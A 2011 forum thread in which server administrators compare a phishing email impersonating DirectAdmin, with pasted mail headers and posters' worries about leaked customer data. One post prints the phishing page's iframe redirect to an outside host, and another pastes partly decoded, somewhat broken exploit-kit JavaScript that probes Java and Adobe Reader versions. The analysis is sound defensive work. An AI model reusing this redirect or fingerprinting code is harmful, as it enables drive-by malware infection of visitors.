"DirectAdmin Client Message" Email - Scam/Real?

2 received here as well. Sure hope they didn't hack the update server too... could be bad juju for all of us if we did what I did and checked for updates and did so accordingly.
 
DA should send out emails telling their clients not to click on the link... sure most are savvy enough to know better but I bet there will be one or two.

Pretty ballsy though for someone to try and scam a bunch of network/server admins... we need target information so we can counterattack!
 
DirectAdmin Client Message

Ass all bottom posts show, I am one of them, who received an email like in bottom:

But smth is interesting: How spammer gets my (Clients private data???)
and also - spam in gmail was received into inbox.

Respect to this spammer :)

-----------------------------------

Dear {MY_NAME} {MY_MIDDLENAME} {MY_SURNAME},

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.com.au/update.php


---------- Original message ----------
Delivered-To: [email protected]
Received: by 10.223.121.205 with SMTP id i13cs180467far;
Wed, 25 May 2011 13:53:36 -0700 (PDT)
Received: by 10.42.131.133 with SMTP id z5mr6517ics.399.1306356814929;
Wed, 25 May 2011 13:53:34 -0700 (PDT)
Return-Path: <[email protected]>
Received: from jbmc-software.com (jbmc-software.com [216.194.67.119])
by mx.google.com with ESMTPS id uz1si1127808icb.24.2011.05.25.13.53.34
(version=TLSv1/SSLv3 cipher=OTHER);
Wed, 25 May 2011 13:53:34 -0700 (PDT)
Received-SPF: pass (google.com: domain of [email protected] designates 216.194.67.119 as permitted sender) client-ip=216.194.67.119;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of [email protected] designates 216.194.67.119 as permitted sender) [email protected]
Received: from apache by jbmc-software.com with local (Exim 4.76)
(envelope-from <[email protected]>)
id 1QPL6H-0006rB-3u
for [email protected]; Wed, 25 May 2011 14:54:41 -0600
To: [email protected]
Subject: DirectAdmin Client Message
From: DirectAdmin <[email protected]>
Message-Id: <[email protected]>
Date: Wed, 25 May 2011 14:54:41 -0600

Dear GRIGOL A CHAAVA,

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.com.au/update.php


Thank you,
DirectAdmin.com
 
I have servers running old versions (oldest is 1.34.4) and I'm afraid to update right now while this isn't sorted out

I suppose they got the servers IPs and will try something
does anyone know what's the last "safe" version (ie, no vulnerability that doesn't require login)?
 
I figured that to be the case. I'm concerned how much of my data has been exposed.

+1

Same IP here: 216.194.67.119

The link in the email shous the following code:

HTML:
<html>
<head><title>Please wait...</title></head>
<body><iframe src="http://keinc0x.com/index.php?tp=ceb16cd2ec10bbb5" name="sfr1" scrolling= no" frameborder="no" align="center"></iframe>
<h1>Redirecting.... Please wait!</h1>
</body>
</html>

...and results in a 404 error.
 
From - Wed May 25 23:03:28 2011
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00800000
X-Mozilla-Keys:
Message-ID: <4DDD6E9D.9090301@XXXXXX>
Disposition-Notification-To: "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Date: Wed, 25 May 2011 23:03:25 +0200
From: "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.15) Gecko/20110303 Thunderbird/3.1.9
MIME-Version: 1.0
To: DirectAdmin Support <[email protected]>
Subject: Fwd: DirectAdmin Client Message
Content-Type: multipart/alternative;
boundary="------------040605020007060801040909"

This is a multi-part message in MIME format.
--------------040605020007060801040909
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit


Also I have received this email ... .... question: what data are not yet ' stolen '? ... password? etc?

- You should begin your afraid of cookies?
 
Ass all bottom posts show, I am one of them, who received an email like in bottom:

But smth is interesting: How spammer gets my (Clients private data???)
and also - spam in gmail was received into inbox.

Respect to this spammer :)

-----------------------------------

Dear {MY_NAME} {MY_MIDDLENAME} {MY_SURNAME},

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.com.au/update.php


---------- Original message ----------
Delivered-To: [email protected]
Received: by 10.223.121.205 with SMTP id i13cs180467far;
Wed, 25 May 2011 13:53:36 -0700 (PDT)
Received: by 10.42.131.133 with SMTP id z5mr6517ics.399.1306356814929;
Wed, 25 May 2011 13:53:34 -0700 (PDT)
Return-Path: <[email protected]>
Received: from jbmc-software.com (jbmc-software.com [216.194.67.119])
by mx.google.com with ESMTPS id uz1si1127808icb.24.2011.05.25.13.53.34
(version=TLSv1/SSLv3 cipher=OTHER);
Wed, 25 May 2011 13:53:34 -0700 (PDT)
Received-SPF: pass (google.com: domain of [email protected] designates 216.194.67.119 as permitted sender) client-ip=216.194.67.119;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of [email protected] designates 216.194.67.119 as permitted sender) [email protected]
Received: from apache by jbmc-software.com with local (Exim 4.76)
(envelope-from <[email protected]>)
id 1QPL6H-0006rB-3u
for [email protected]; Wed, 25 May 2011 14:54:41 -0600
To: [email protected]
Subject: DirectAdmin Client Message
From: DirectAdmin <[email protected]>
Message-Id: <[email protected]>
Date: Wed, 25 May 2011 14:54:41 -0600

Dear GRIGOL A CHAAVA,

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.com.au/update.php


Thank you,
DirectAdmin.com
as the other threads all say, clearly someone got into one of directadmins servers with client data.
 
same here and I agree, they have my full name and prime email address.

as for the clicking, I "Never" ever click a link without 1st hovering it to see its actual address, then if suspicious I go to the main site, in this case DA, and see if its legit , this was pretty simple to avoid, I mean what does austinfosec have to do with Direct Admin, nothing :eek:
 
And what exactly does it do too?

here it is somewhat decoded:

Code:
');function end_redirect(){}var javafile='./games/getJavaInfo.jar';var jver=[0,0,0,0],pdfver=[0,0,0,0];try{var PluginDetect={handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;ag(b[a],10)){return 1}if(g(c[a],10)c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(d){if(!a.isIE&&d){var c,b,e,f=a.isString(d)?[d]:d;if(!f||!f.length){return null}for(e=0;e2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(b){var f=null,d,c=this,a;try{f=new c.AXO(b)}catch(d){}return f},convertFuncs:function(g){var a,h,f,b=/^[\$][\$]/,d={},c=this;for(a in g){if(b.test(a)){d[a]=1}}for(a in d){try{h=a.slice(2);if(h.length>0&&!g[h]){g[h]=g[a](g);delete g[a]}}catch(f){}}},initScript:function(){var c=this,a=navigator,e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\\s*PC",22.3,"",100];for(f=d.length-2;f>=0;f=f-2){if(d[f]&&new RegExp(d[f],"i").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.isIE=new Function("return "+e+"*@cc_on!@*"+e+"false")();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.ActiveXEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(f=0;f0&&c.isFunc(b[0])))){a.push(b)}},callArray:function(b){var c=this,a;if(c.isArray(b)){for(a=0;a0&&b.isFunc(c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)}else{if(b.isFunc(c)){c(b)}}},getVersionDelimiter:",",$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b,h;if(e<0){return null};f=a.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.getVersionDelimiter):b;return b}},cleanup:function(){var a=this;if(a.garbage&&a.isDefined(window.CollectGarbage)){window.CollectGarbage()}},addWinEvent:function(d,c){var e=this,a=window,b;if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)}else{if(a.attachEvent){a.attachEvent("on"+d,c)}else{b=a["on"+d];a["on"+d]=e.winHandler(c,b)}}}},winHandler:function(d,c){return function(){d();if(typeof c=="function"){c()}}},WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){a.winLoaded=true;a.callArray(a.WLfuncs0);a.callArray(a.WLfuncs);if(a.onDoneEmptyDiv){a.onDoneEmptyDiv()}},winLoaded:false,$$onWindowLoaded:function(a){return function(b){if(a.winLoaded){a.call(b)}else{a.fPush(b,a.WLfuncs)}}},div:null,divWidth:50,pluginSize:1,emptyDiv:function(){var c=this,a,e,b,d=0;if(c.div&&c.div.childNodes){for(a=c.div.childNodes.length-1;a>=0;a--){b=c.div.childNodes[a];if(b&&b.childNodes){if(d==0){for(e=b.childNodes.length-1;e>=0;e--){b.removeChild(b.childNodes[e])}c.div.removeChild(b)}else{}}}}},DONEfuncs:[],onDoneEmptyDiv:function(){var c=this,a,b;if(!c.winLoaded){return}if(c.WLfuncs&&c.WLfuncs.length&&c.WLfuncs[c.WLfuncs.length-1]!==null){return}for(a in c){b=c[a];if(b&&b.funcs){if(b.OTF==3){return}if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null){return}}}for(a=0;a=i){return -1}try{if(l==c.pluginSize&&(!c.isIE||c.getDOMobj(m).readyState==4)){if(!m.winLoaded&&c.winLoaded){return 1}if(m.winLoaded&&c.isNum(b)){if(!c.isNum(m.count)){m.count=b}if(b-m.count>=10){return 1}}}}catch(f){}return 0},getDOMobj:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;try{if(b&&a){c.firstChild.focus()}}catch(f){}return b?c.firstChild:null},setStyle:function(b,g){var f=b.style,a,d,c=this;if(f&&g){for(a=0;ao'+b+"/div>");c=f.getElementById(h)}catch(g){}}a=(f.getElementsByTagName("body")[0]||f.body);if(a){if(a.firstChild&&d.isDefined(a.insertBefore)){a.insertBefore(i,a.firstChild)}else{a.appendChild(i)}if(c){a.removeChild(c)}}else{}},insertHTML:function(g,b,h,a,k){var l,m=document,j=this,q,o=m.createElement("span"),n,i,f="<";var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];if(!j.isDefined(a)){a=""}if(j.isString(g)&&(/[^\s]/).test(g)){q=f+g+' width="'+j.pluginSize+'" height="'+j.pluginSize+'" ';for(n=0;n'}}q+=a+f+"/"+g+">"}else{q=a}if(!j.div){j.div=m.createElement("div");i=m.getElementById("plugindetect");if(i){j.div=i}else{j.div.id="plugindetect";j.insertDivInBody(j.div)}j.setStyle(j.div,c.concat(["width",j.divWidth+"px","height",(j.pluginSize+3)+"px","fontSize",(j.pluginSize+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));if(!i){j.setStyle(j.div,["position","absolute","right","0px","top","0px"])}}if(j.div&&j.div.parentNode){j.div.appendChild(o);j.setStyle(o,c.concat(["fontSize",(j.pluginSize+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));try{if(o&&o.parentNode){o.focus()}}catch(l){}try{o.innerHTML=q}catch(l){}if(o.childNodes.length==1&&!(j.isGecko&&j.compareNums(j.verGecko,"1,5,0,0")<0)){j.setStyle(o.firstChild,c.concat(["display","inline"]))}return{span:o,winLoaded:j.winLoaded,tagName:(j.isString(g)?g:"")}}return{span:null,winLoaded:j.winLoaded,tagName:""}},java:{mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],mimeTypeJPI:"application/x-java-applet;jpi-version=",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",DTKclassID:"clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",DTKmimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],forceVerifyTag:[],jar:[],Enabled:navigator.javaEnabled(),VENDORS:["Sun Microsystems Inc.","Apple Computer, Inc."],OTF:null,All_versions:[],mimeTypeJPIresult:"",JavaPlugin_versions:[],JavaVersions:[[1,9,2,30],[1,8,2,30],[1,7,2,30],[1,6,1,30],[1,5,1,30],[1,4,2,30],[1,3,1,30]],searchJavaPluginAXO:function(){var h=null,a=this,c=a.$,g=[],j=[1,5,0,14],i=[1,6,0,2],f=[1,3,1,0],e=[1,4,2,0],d=[1,5,0,7],b=false;if(!c.ActiveXEnabled){return null};if(c.verIE>=a.minIEver){g=a.searchJavaAXO(i,i,b);if(g.length>0&&b){g=a.searchJavaAXO(j,j,b)}}else{if(g.length==0){g=a.searchJavaAXO(f,e,false)}}if(g.length>0){h=g[0]}a.JavaPlugin_versions=[].concat(g);return h},searchJavaAXO:function(l,i,m){var n,f,h=this.$,q,k,a,e,g,j,b,r=[];if(h.compareNums(l.join(","),i.join(","))>0){i=l}i=h.formatNum(i.join(","));var o,d="1,4,2,0",c="JavaPlugin."+l[0]+""+l[1]+""+l[2]+""+(l[3]>0?("_"+(l[3]<10?"0":"")+l[3]):"");for(n=0;n=0;a--){b="JavaWebStart.isInstalled."+g+a+".0";if(h.compareNums(f[0]+","+f[1]+","+a+",0",i)>=0&&!h.getAXO(b)){continue}o=h.compareNums(f[0]+","+f[1]+","+a+",0",d)<0?true:false;for(e=f[3];e>=0;e--){k=a+"_"+(e<10?"0"+e:e);j=q+k;if(h.getAXO(j)&&(o||h.getAXO(b))){r.push(g+k);if(!m){return r}}if(j==c){return r}}if(h.getAXO(q+a)&&(o||h.getAXO(b))){r.push(g+a);if(!m){return r}}if(q+a==c){return r}}}return r},minIEver:7,getMimeJPIversion:function(){var h,a=this,d=a.$,c=new RegExp("("+a.mimeTypeJPI+")(\\d.*)","i"),k=new RegExp("Java","i"),e,j,f="",i={},g=0,b;for(h=0;h0){b=e}}a.mimeTypeJPIresult=g>0?a.mimeTypeJPI+i["a"+b]:"";return g>0?b:null},getVersion:function(m,d,l){var f,c=this,e=c.$,h=c.NOTF,b=c.applet,j=c.verify,i=vendor=versionEnabled=null;if(c.getVersionDone===null){c.OTF=0;c.mimeObj=e.hasMimeType(c.mimeType);c.deployTK.$=e;c.deployTK.parentNode=c;b.$=e;b.parentNode=c;if(h){h.$=e;h.parentNode=c}if(j){j.parentNode=c;j.$=e;j.init()}}var k;if(e.isArray(l)){for(k=0;k=0)?q:n}else{i=q||n}}}if(!i&&c.mimeObj&&e.isSafari&&e.OS==2){a=e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa",0);if(a){q=e.getNum(a.description);if(q){i=q}}}if(i){c.version0=i;if(c.Enabled){versionEnabled=i}}}else{if(!i&&g.status==0){i=c.searchJavaPluginAXO();if(i){vendor=c.VENDORS[0]}}if(i){c.version0=i;if(c.Enabled&&e.ActiveXEnabled){versionEnabled=i}}}if(!versionEnabled||b.canTryAny()){f=b.insertHTMLQueryAll(d);if(f[0]){versionEnabled=f[0];vendor=f[1]}}if(!versionEnabled&&(f=c.queryWithoutApplets())[0]){c.version0=versionEnabled=f[0];vendor=f[1];if(c.installed==-0.5){c.installed=0.5}}if(e.isSafari&&e.OS==2){if(!versionEnabled&&o){if(c.installed===null){c.installed=0}else{if(c.installed==-0.5){c.installed=0.5}}}}if(c.jreDisabled()){versionEnabled=null};if(c.installed===null){c.installed=versionEnabled?1:(i?-0.2:-1)}c.EndGetVersion(versionEnabled,vendor)},EndGetVersion:function(b,d){var a=this,c=a.$;if(a.version0){a.version0=c.formatNum(c.getNum(a.version0))}if(b){a.version=c.formatNum(c.getNum(b));a.vendor=(c.isString(d)?d:"")}if(a.getVersionDone!=1){a.getVersionDone=0}},jreDisabled:function(){var b=this,d=b.$,c=b.deployTK.query().JRE,a;if(c&&d.OS==1){if((d.isGecko&&d.compareNums(d.verGecko,"1,9,2,0")>=0&&d.compareNums(c,"1,6,0,12")<0)||(d.isChrome&&d.compareNums(c,"1,6,0,12")<0)){return 1}};if(d.isOpera&&d.verOpera>=9&&!b.Enabled&&!b.mimeObj&&!b.queryWithoutApplets()[0]){return 1}if((d.isGecko||d.isChrome)&&!b.mimeObj&&!b.queryWithoutApplets()[0]){return 1}return 0},deployTK:{status:null,JREall:[],JRE:null,HTML:null,query:function(){var f=this,h=f.$,c=f.parentNode,i,a,b,g=len=null;if(f.status!==null){return f}f.status=0;if((h.isGecko&&h.compareNums(h.verGecko,h.formatNum("1.6"))<=0)||h.isSafari||h.isChrome||(h.isIE&&!h.ActiveXEnabled)){return f}if(h.isIE&&h.verIE>=6){f.HTML=h.insertHTML("object",[],[]);g=h.getDOMobj(f.HTML)}else{if(!h.isIE&&(b=h.hasMimeType(c.DTKmimeType))&&b.type){f.HTML=h.insertHTML("object",["type",b.type],[]);g=h.getDOMobj(f.HTML)}}if(g){if(h.isIE&&h.verIE>=6){try{g.classid=c.DTKclassID}catch(i){}};try{var d=g.jvms;if(d){len=d.getLength();if(h.isNum(len)){f.status=len>0?1:-1;for(a=0;a0){f.JRE=h.formatNum(f.JREall[0])}return f}},queryWithoutApplets00:function(c,a){var b=window.java,d;try{if(b&&b.lang&&b.lang.System){a.value=[b.lang.System.getProperty("java.version")+" ",b.lang.System.getProperty("java.vendor")+" "]}}catch(d){}},queryWithoutApplets:function(){var c=this,f=c.$,g,a=c.queryWithoutApplets;if(!a.value){a.value=[null,null];if(!f.isIE&&window.java){if(f.OS==2&&f.isOpera&&f.verOpera<9.2&&f.verOpera>=9){}else{if(f.isGecko&&f.compareNums(f.verGecko,"1,9,0,0")<0&&f.compareNums(f.verGecko,"1,8,0,0")>=0){}else{if(f.isGecko){var i,b,h=document;if(h.createElement&&h.createEvent){try{i=h.createElement("div"),b=h.createEvent("HTMLEvents");b.initEvent("change",false,false);i.addEventListener("change",f.handler(c.queryWithoutApplets00,f,a),false);i.dispatchEvent(b)}catch(g){}}}else{c.queryWithoutApplets00(f,a)}}}}}return a.value},applet:{results:[[null,null],[null,null],[null,null]],HTML:[0,0,0],active:[0,0,0],allowed:[2,2,2],DummyObjTagHTML:0,DummySpanTagHTML:0,getResult:function(){var c=this.results,a,b;for(a=0;a0?0:1}return g.getResult()}},append:function(e,d){for(var c=0;cg)){g=RegExp.$1}}}catch(h){}f.installed=g?1:(p?0:-1)}if(!f.version){f.version=c.formatNum(g)}f.INSTALLED[j]=f.installed}},zz:0};PluginDetect.initScript();PluginDetect.getVersion(".");jver=PluginDetect.getVersion("Java",javafile);pdfver=PluginDetect.getVersion("AdobeReader");}catch(e){}if(typeof jver=='string'){jver=jver.split('.')}else{jver=[0,0,0,0]}if(typeof pdfver=='string'){pdfver=pdfver.split('.')}else{pdfver=[0,0,0,0]}function spl0(){spl1()}function spl1(){spl2()}function spl2(){spl3()}function spl3(){spl4()}function spl4(){spl5()}function spl5(){spl6()}function spl6(){setTimeout(end_redirect,6000)}spl0()
 
I have servers running old versions (oldest is 1.34.4) and I'm afraid to update right now while this isn't sorted out

I suppose they got the servers IPs and will try something
does anyone know what's the last "safe" version (ie, no vulnerability that doesn't require login)?

I think it is not the directadmin running on your server that has a vulnerability. It is probably the directadmin.com (216.194.67.119) server. But I do recommend you don't update directadmin, until there is more information about this issue.
 
It's the same for me with my name.
Headers mail :
Delivered-To: ***@gmail.com
Received: by 10.146.41.14 with SMTP id o14cs150239yao;
Wed, 25 May 2011 13:50:58 -0700 (PDT)
Received: by 10.42.163.130 with SMTP id c2mr12982010icy.522.1306356657741;
Wed, 25 May 2011 13:50:57 -0700 (PDT)
Return-Path: <[email protected]>
Received: from jbmc-software.com (jbmc-software.com [216.194.67.119])
by mx.google.com with ESMTPS id hx9si1057210icc.46.2011.05.25.13.50.57
(version=TLSv1/SSLv3 cipher=OTHER);
Wed, 25 May 2011 13:50:57 -0700 (PDT)
Received-SPF: pass (google.com: domain of [email protected] designates 216.194.67.119 as permitted sender) client-ip=216.194.67.119;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of [email protected] designates 216.194.67.119 as permitted sender) [email protected]
Received: from apache by jbmc-software.com with local (Exim 4.76)
(envelope-from <[email protected]>)
id 1QPL3k-0004dm-8e
for ***@gmail.com; Wed, 25 May 2011 14:52:04 -0600
To: ***@gmail.com
Subject: DirectAdmin Client Message
From: DirectAdmin <[email protected]>
Message-Id: <[email protected]>
Date: Wed, 25 May 2011 14:52:04 -0600

Mail :
Dear *** ***,

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.com.au/update.php


Thank you,
DirectAdmin.com
 
Same here getting this email, kinda worrying. Any official word on this from DA?

Return-path: <[email protected]>
Delivery-date: Wed, 25 May 2011 16:51:44 -0400
Received: from jbmc-software.com ([216.194.67.119]:44577)
by xxxxxxx with esmtps (TLSv1:AES256-SHA:256)
(Exim 4.69)
(envelope-from <[email protected]>)
for xxxxxxx; Wed, 25 May 2011 16:51:44 -0400
Received: from apache by jbmc-software.com with local (Exim 4.76)
(envelope-from <[email protected]>)
for xxxxx; Wed, 25 May 2011 14:52:49 -0600
To: xxxxx
Subject: DirectAdmin Client Message
From: DirectAdmin <[email protected]>
Message-Id: <[email protected]>
Date: Wed, 25 May 2011 14:52:49 -0600

Dear xxxxx,

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.com.au/xxxxx.php


Thank you,
DirectAdmin.com
 
Last edited:
Back
Top